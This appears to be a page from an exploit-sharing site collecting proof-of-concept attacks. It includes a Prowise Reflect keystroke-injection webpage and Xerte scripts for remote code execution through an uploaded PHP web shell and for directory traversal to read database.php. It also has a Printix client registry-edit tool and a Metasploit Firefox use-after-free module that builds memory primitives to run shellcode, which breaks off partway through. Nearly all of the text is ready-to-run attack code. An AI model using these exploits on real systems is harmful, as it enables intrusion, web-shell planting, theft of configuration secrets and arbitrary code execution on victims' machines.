Latest exploits :: CodePwn

<pre><code># Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection # Date: 30/10/2022 # Exploit Author: Rik Lutz # Vendor Homepage: https://www.prowise.com/ # Version: V1.0.9 # Tested on: Windows 10 # Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. # Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed), # or by visiting a malicious website. This POC contains the malicious webpage. # Steps: # 1. Start Prowise reflect # 2. Try to connect to a reflect server e.q. ygm7u6od # 3. When it is connecting click exploit # - Start menu will open, types notepad.exe and types hello world. <!DOCTYPE HTML> <html> <head> <script type = "text/javascript"> function wait(ms){ var start = new Date().getTime(); var end = start; while(end < start + ms) { end = new Date().getTime(); } } function WebSocketTest() { var StateConnecting = new Boolean(false); if ("WebSocket" in window) { // Let us open a web socket var ws = new WebSocket("ws://localhost:8082"); ws.onopen = function() { ws.send('{"event":"keyboard", "key":"super"}'); wait(400); //character is slower // ws.send('{"event":"keyboard", "character":"notepad.exe"}'}; // You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true var exploitcode = "notepad.exe" for (let i = 0; i < exploitcode.length; i++) { ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}'); } wait(300); ws.send('{"event":"keyboard", "key":"enter"}'); wait(2000); exploitcode = "Hello world!" for (let i = 0; i < exploitcode.length; i++) { ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}'); } wait(200); }; ws.onmessage = function (evt) { var received_msg = evt.data; }; ws.onclose = function() { // websocket is closed. alert("Connection is closed..."); }; } else { // The browser doesn't support WebSocket alert("WebSocket NOT supported by your Browser!"); } } </script> </head> <body> <div id = "sse"> <a href = "javascript:WebSocketTest()">Exploit!</a> </div> </body> </html> </code></pre>

<pre><code># Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated) # Date: 05/03/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https://xerte.org.uk # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip # Version: up until version 3.9 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44664 # This PoC assumes guest login is enabled and the en-GB langues files are used. # This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell. # Vulnerable url: https://<host>/website_code/php/import/fileupload.php # The mediapath variable can be used to set the destination of the uploaded. # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota import requests import re xerte_base_url = "http://127.0.0.1" php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. with requests.Session() as session: # Get a PHP session ID if not php_session_id: session.get(xerte_base_url) else: session.cookies.set("PHPSESSID", php_session_id) # Use a default template data = { 'tutorialid': 'Nottingham', 'templatename': 'Nottingham', 'tutorialname': 'exploit', 'folder_id': '' } # Create a new project in order to find the install path template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) # Find template ID data = { 'template_id': re.findall('(\d+)', template_id.text)[0] } # Find the install path: install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3', 'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978', } # index.inc file data = \ '''-----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc" Content-Type: application/octet-stream <?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; } /** * * index.php english language file * * @author Patrick Lockley * @version 1.0 * @copyright Pat Lockley * @package */ define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password"); define("INDEX_USERNAME_EMPTY", "Please enter your username"); define("INDEX_PASSWORD_EMPTY", "Please enter your password"); define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page"); define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct"); define("INDEX_LOGIN", "login area"); define("INDEX_USERNAME", "Username"); define("INDEX_PASSWORD", "Password"); define("INDEX_HELP_TITLE", "Getting Started"); define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website."); define("INDEX_HELP_INTRO_LINK_TEXT","Show me!"); define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); define("INDEX_FOLDER_PROMPT","What would you like to call your folder?"); define("INDEX_WORKSPACE_TITLE","My Projects"); define("INDEX_CREATE","Project Templates"); define("INDEX_DETAILS","Project Details"); define("INDEX_SORT","Sort"); define("INDEX_SEARCH","Search"); define("INDEX_SORT_A","Alphabetical A-Z"); define("INDEX_SORT_Z","Alphabetical Z-A"); define("INDEX_SORT_NEW","Age (New to Old)"); define("INDEX_SORT_OLD","Age (Old to New)"); define("INDEX_LOG_OUT","Log out"); define("INDEX_LOGGED_IN_AS","Logged in as"); define("INDEX_BUTTON_LOGIN","Login"); define("INDEX_BUTTON_LOGOUT","Logout"); define("INDEX_BUTTON_PROPERTIES","Properties"); define("INDEX_BUTTON_EDIT","Edit"); define("INDEX_BUTTON_PREVIEW", "Preview"); define("INDEX_BUTTON_SORT", "Sort"); define("INDEX_BUTTON_NEWFOLDER", "New Folder"); define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create"); define("INDEX_BUTTON_DELETE", "Delete"); define("INDEX_BUTTON_DUPLICATE", "Duplicate"); define("INDEX_BUTTON_PUBLISH", "Publish"); define("INDEX_BUTTON_CANCEL", "Cancel"); define("INDEX_BUTTON_SAVE", "Save"); define("INDEX_XAPI_DASHBOARD_FROM", "From:"); define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:"); define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:"); define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups"); define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses"); define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard"); define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options"); define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns"); define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview"); define("INDEX_XAPI_DASHBOARD_PRINT", "Print"); \r \r -----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="mediapath" ''' \ + install_path \ + '''../../../languages/en-GB/ -----------------------------170331411929658976061651588978--\r ''' # Overwrite index.inc file response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data) print('Installation path: ' + install_path) print(response.text) if "success" in response.text: print("Visit shell @: " + xerte_base_url + '/?cmd=whoami') </code></pre>

<pre><code># Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated) # Date: 05/03/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https://xerte.org.uk # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip # Version: up until 3.10.3 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44665 # This PoC assumes guest login is enabled. Vulnerable url: # https://<host>/getfile.php?file=<user-direcotry>/../../database.php # You can find a userfiles-directory by creating a project and browsing the media menu. # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download # The userfiles-direcotry will be noted in the URL and/or when you download a file. # They look like: <numbers>-<username>-<templatename> import requests import re xerte_base_url = "http://127.0.0.1" file_to_grab = "/../../database.php" php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. with requests.Session() as session: # Get a PHP session ID if not php_session_id: session.get(xerte_base_url) else: session.cookies.set("PHPSESSID", php_session_id) # Use a default template data = { 'tutorialid': 'Nottingham', 'templatename': 'Nottingham', 'tutorialname': 'exploit', 'folder_id': '' } # Create a new project in order to create a user-folder template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) # Find template ID data = { 'template_id': re.findall('(\d+)', template_id.text)[0] } # Find the created user-direcotry: user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0] # Grab file result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) print(result.text) print("|-- Used Variables: --|") print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID']) print("user direcotry: " + user_direcotry) print("Curl example:") print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) </code></pre>

<pre><code># Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE) # Date: 3/1/2022 # Exploit Author: Logan Latvala # Vendor Homepage: https://printix.net # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip # Version: <= 1.3.1106.0 # Tested on: Windows 7, Windows 8, Windows 10, Windows 11 # CVE : CVE-2022-25089 # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089 using Microsoft.Win32; using Newtonsoft.Json; using Newtonsoft.Json.Converters; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; /** * ________________________________________ * * Printix Vulnerability, CVE-2022-25089 * Part of a Printix Vulnerability series * Author: Logan Latvala * Github: https://github.com/ComparedArray/printix-CVE-2022-25089 * ________________________________________ * */ namespace ConsoleApp1a { public class PersistentRegistryData { public PersistentRegistryCmds cmd; public string path; public int VDIType; public byte[] registryData; } [JsonConverter(typeof(StringEnumConverter))] public enum PersistentRegistryCmds { StoreData = 1, DeleteSubTree, RestoreData } public class Session { public int commandNumber { get; set; } public string host { get; set; } public string data { get; set; } public string sessionName { get; set; } public Session(int commandSessionNumber = 0) { commandNumber = commandSessionNumber; switch (commandSessionNumber) { //Incase it's initiated, kill it immediately. case (0): Environment.Exit(0x001); break; //Incase the Ping request is sent though, get its needed data. case (2): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); data = "pingData"; sessionName = "PingerRinger"; break; //Incase the RegEdit request is sent though, get its needed data. case (49): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); PersistentRegistryData persistentRegistryData = new PersistentRegistryData(); persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData; persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType; //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName"; Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n"); Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n"); Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE"); Console.Write("Registry Node: "); persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix"); Console.WriteLine("Full Address Set To: " + persistentRegistryData.path); //persistentRegistryData.registryData = new byte[2]; //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String); Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n"); Console.Write("Type: "); int dataF = int.Parse(Console.ReadLine()); Console.WriteLine("Set Data to: " + dataF); Console.WriteLine("\n What value is your type? \n"); Console.Write("Value: "); string dataB = Console.ReadLine(); Console.WriteLine("Set Data to: " + dataF); byte[] loader = null; List<byte> byteContainer = new List<byte>(); //Dword = 4 //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!) switch (dataF) { case (1): loader = selectDataType(dataB, RegistryValueKind.String); byteContainer.Add(1); break; case (2): loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord); byteContainer.Add(4); break; case (3): loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord); byteContainer.Add(11); break; case (4): loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString); byteContainer.Add(7); break; } int pathHolder = 0; foreach (byte bit in loader) { pathHolder++; byteContainer.Add(bit); } persistentRegistryData.registryData = byteContainer.ToArray(); //added stuff: //PersistentRegistryData data = new PersistentRegistryData(); //data.cmd = PersistentRegistryCmds.RestoreData; //data.path = ""; //data.cmd Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData)); data = JsonConvert.SerializeObject(persistentRegistryData); break; //Custom cases, such as custom JSON Inputs and more. case (100): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); Console.WriteLine("\n What Data Should Be Sent?\n"); Console.Write("Data: "); data = Console.ReadLine(); Console.WriteLine("Data set to: " + data); Console.WriteLine("\n What Session Name Should Be Used? \n"); Console.Write("Session Name: "); sessionName = Console.ReadLine(); Console.WriteLine("Session name set to: " + sessionName); break; } } public static byte[] selectDataType(object value, RegistryValueKind format) { byte[] array = new byte[50]; switch (format) { case RegistryValueKind.String: //1 array = Encoding.UTF8.GetBytes((string)value); break; case RegistryValueKind.DWord://4 array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value)); break; case RegistryValueKind.QWord://11 if (value == null) { value = 0L; } array = BitConverter.GetBytes((long)value); break; case RegistryValueKind.MultiString://7 { if (value == null) { value = new string[1] { string.Empty }; } string[] array2 = (string[])value; foreach (string s in array2) { byte[] bytes = Encoding.UTF8.GetBytes(s); byte[] second = new byte[1] { (byte)bytes.Length }; array = array.Concat(second).Concat(bytes).ToArray(); } break; } } return array; } } class CVESUBMISSION { static void Main(string[] args) { FORCERESTART: try { //Edit any registry without auth: //Use command 49, use the code provided on the desktop... //This modifies it directly, so no specific username is needed. :D //The command parameter, a list of commands is below. int command = 43; //To force the user to input variables or not. bool forceCustomInput = false; //The data to send, this isn't flexible and should be used only for specific examples. //Try to keep above 4 characters if you're just shoving things into the command. string data = "{\"profileID\":1,\"result\":true}"; //The username to use. //This is to fulfill the requriements whilst in development mode. DefaultValues.CurrentSessName = "printixMDNs7914"; //The host to connect to. DEFAULT= "localhost" string host = "192.168.1.29"; // Configuration Above InvalidInputLabel: Console.Clear(); Console.WriteLine("Please select the certificate you want to use with port 21338."); //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now. Console.WriteLine("Already selected, client authentication isn't needed."); Console.WriteLine(" /───────────────────────────\\ "); Console.WriteLine("\nWhat would you like to do?"); Console.WriteLine("\n 1. Send Ping Request"); Console.WriteLine(" 2. Send Registry Edit Request"); Console.WriteLine(" 3. Send Custom Request"); Console.WriteLine(" 4. Experimental Mode (Beta)\n"); Console.Write("I choose option # "); try { switch (int.Parse(Console.ReadLine().ToLower())) { case (1): Session session = new Session(2); command = session.commandNumber; host = session.host; data = session.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (2): Session sessionTwo = new Session(49); command = sessionTwo.commandNumber; host = sessionTwo.host; data = sessionTwo.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (3): Console.WriteLine("What command number do you want to input?"); command = int.Parse(Console.ReadLine().ToString()); Console.WriteLine("What IP would you like to use? (Default = localhost)"); host = Console.ReadLine(); Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)"); data = Console.ReadLine(); Console.WriteLine("What session name do you want to use? "); DefaultValues.CurrentSessName = Console.ReadLine(); break; case (4): Console.WriteLine("Not yet implemented."); break; } } catch (Exception e) { Console.WriteLine("Invalid Input!"); goto InvalidInputLabel; } Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala"); Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n"); CompCommClient client = new CompCommClient(); byte[] responseStorage = new byte[25555]; int responseCMD = 0; client.Connect(host, 21338, 3, 10000); client.SendMessage(command, Encoding.UTF8.GetBytes(data)); // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it. // Check for output multiple times, and see if this is conclusive. //client.SendMessage(51, Encoding.ASCII.GetBytes(data)); new Thread(() => { //Thread.Sleep(4000); if (client.Connected()) { int cam = 0; // 4 itterations of loops, may be lifted in the future. while (cam < 5) { //Reads the datastream and keeps returning results. //Thread.Sleep(100); try { try { if (responseStorage?.Any() == true) { //List<byte> byo1 = responseStorage.ToList(); if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption")) { foreach (char cam2 in Encoding.UTF8.GetString(responseStorage)) { if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2)) { Console.Write(cam2); } } }else { } } } catch (Exception e) { Debug.WriteLine(e); } client.Read(out responseCMD, out responseStorage); } catch (Exception e) { goto ReadException; } Thread.Sleep(100); cam++; //Console.WriteLine(cam); } } else { Console.WriteLine("[WARNING]: Client is Disconnected!"); } ReadException: try { Console.WriteLine("Command Variable Response: " + responseCMD); Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD); client.disConnect(); } catch (Exception e) { Console.WriteLine("After 4.2 Seconds, there has been no response!"); client.disConnect(); } }).Start(); Console.WriteLine(responseCMD); Console.ReadLine(); } catch (Exception e) { Console.WriteLine(e); Console.ReadLine(); //Environment.Exit(e.HResult); } goto FORCERESTART; } } } </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpServer::BrowserExploit def initialize(info = {}) super( update_info( info, 'Name' => 'Firefox MCallGetProperty Write Side Effects Use After Free Exploit', 'Description' => %q{ This modules exploits CVE-2020-26950, a use after free exploit in Firefox. The MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition. This exploit uses a somewhat novel technique of spraying ArgumentsData structures in order to construct primitives. The shellcode is forced into executable memory via the JIT compiler, and executed by writing to the JIT region pointer. This exploit does not contain a sandbox escape, so firefox must be run with the MOZ_DISABLE_CONTENT_SANDBOX environment variable set, in order for the shellcode to run successfully. This vulnerability affects Firefox < 82.0.3, Firefox ESR < 78.4.1, and Thunderbird < 78.4.2, however only Firefox <= 79 is supported as a target. Additional work may be needed to support other versions such as Firefox 82.0.1. }, 'License' => MSF_LICENSE, 'Author' => [ '360 ESG Vulnerability Research Institute', # discovery 'maxpl0it', # writeup and exploit 'timwr', # metasploit module ], 'References' => [ ['CVE', '2020-26950'], ['URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2020-49/#CVE-2020-26950'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1675905'], ['URL', 'https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/'], ], 'Arch' => [ ARCH_X64 ], 'Platform' => ['linux', 'windows'], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic', {}], ], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ IOC_IN_LOGS ], 'Stability' => [CRASH_SAFE] }, 'DisclosureDate' => '2020-11-18' ) ) end def create_js_shellcode shellcode = "AAAA\x00\x00\x00\x00" + "\x90\x90\x90\x90\x90\x90\x90\x90" + payload.encoded if (shellcode.length % 8 > 0) shellcode += "\x00" * (8 - shellcode.length % 8) end shellcode_js = '' for chunk in 0..(shellcode.length / 8) - 1 label = (0x41 + chunk / 26).chr + (0x41 + chunk % 26).chr shellcode_chunk = shellcode[chunk * 8..(chunk + 1) * 8] shellcode_js += label + ' = ' + shellcode_chunk.unpack('E').first.to_s + "\n" end shellcode_js end def on_request_uri(cli, request) print_status("Sending #{request.uri} to #{request['User-Agent']}") shellcode_js = create_js_shellcode jscript = <<~JS // Triggers the vulnerability function jitme(cons, interesting, i) { interesting.x1 = 10; // Make sure the MSlots is saved new cons(); // Trigger the vulnerability - Reallocates the object slots // Allocate a large array on top of this previous slots location. let target = [0,1,2,3,4,5,6,7,8,9,10,11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489]; // Goes on to 489 to be close to the number of properties ‘cons’ has // Avoid Elements Copy-On-Write by pushing a value target.push(i); // Write the Initialized Length, Capacity, and Length to be larger than it is // This will work when interesting == cons interesting.x1 = 3.476677904727e-310; interesting.x0 = 3.4766779039175e-310; // Return the corrupted array return target; } // Initialises vulnerable objects function init() { // arr will contain our sprayed objects var arr = []; // We'll create one object... var cons = function() {}; for(j=0; j<512; j++) cons['x'+j] = j; // Add 512 properties (Large jemalloc allocation) arr.push(cons); // ...then duplicate it a whole bunch of times // The number of times has two uses: // - Heap spray - Stops any already freed objects getting in our way // - Allows us to get the jitme function compiled for (var i = 0; i < 20000; i++) arr.push(Object.assign(function(){}, cons)); // Return the array return arr; } // Global that holds the total number of objects in our original spray array TOTAL = 0; // Global that holds the target argument so it can be used later arg = 0; evil = 0; // setup_prim - Performs recursion to get the vulnerable arguments object // arguments[0] - Original spray array // arguments[1] - Recursive depth counter // arguments[2]+ - Numbers to pad to the right reallocation size function setup_prim() { // Base case of our recursion // If we have reached the end of the original spray array... if(arguments[1] == TOTAL) { // Delete an argument to generate the RareArgumentsData pointer delete arguments[3]; // Read out of bounds to the next object (sprayed objects) // Check whether the RareArgumentsData pointer is null if(evil[511] != 0) return arguments; // If it was null, then we return and try the next one return 0; } // Get the cons value let cons = arguments[0][arguments[1]]; // Move the pointer (could just do cons.p481 = 481, but this is more fun) new cons(); // Recursive call res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480 ); // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it if(res != 0) return res; // Otherwise, repeat the base case (delete an argument) delete arguments[3]; // Check if the next object has a null RareArgumentsData pointer if(evil[511] != 0) return arguments; // Return arguments if not // Otherwise just return 0 and try the next one return 0; } // weak_read32 - Bit-by-bit read function weak_read32(arg, addr) { // Set the RareArgumentsData pointer to the address evil[511] = addr; // Used to hold the leaked data let val = 0; // Read it bit-by-bit for 32 bits // Endianness is taken into account for(let i = 32; i >= 0; i--) { val = val << 1; // Shift if(arg[i] == undefined) { val = val | 1; } } // Return the integer return val; } // weak_read64 - Bit-by-bit read using BigUint64Array function weak_read64(arg, addr) { // Set the RareArgumentsData pointer to the address evil[511] = addr; // Used to hold the leaked data val = new BigUint64Array(1); val[0] = 0n; // Read it bit-by-bit for 64 bits for(let i = 64; i >= 0; i--) { val[0] = val[0] << 1n; if(arg[i] == undefined) { val[0] = val[0] | 1n; } } // Return the BigInt return val[0]; } // write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box function write_nan(arg, addr) { evil[511] = addr; for(let i = 64 - 15; i < 64; i++) delete arg[i]; // Delete bits 49-64 to create 0xfffe pointer box } // write - Write a value to an address function write(address, value) { // Set the fake ArrayBuffer backing store address address = dbl_to_bigint(address) target_uint32arr[14] = parseInt(address) & 0xffffffff target_uint32arr[15] = parseInt(address >> 32n); // Use the fake ArrayBuffer backing store to write a value to a location value = dbl_to_bigint(value); fake_arrbuf[1] = parseInt(value >> 32n); fake_arrbuf[0] = parseInt(value & 0xffffffffn); } // addrof - Gets the address of a given object function addrof(arg, o) { // Set the 5th property of the arguments object arg[5] = o; // Get the address of the 5th property target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7) // Set the fake ArrayBuffer backing store to point to this location target_uint32arr[14] = parseInt(target) & 0xffffffff; target_uint32arr[15] = parseInt(target >> 32n); // Read the address of the object o return (BigInt(fake_arrbuf[1] & 0xffff) << 32n) + BigInt(fake_arrbuf[0]); } // shellcode - Constant values which hold our shellcode 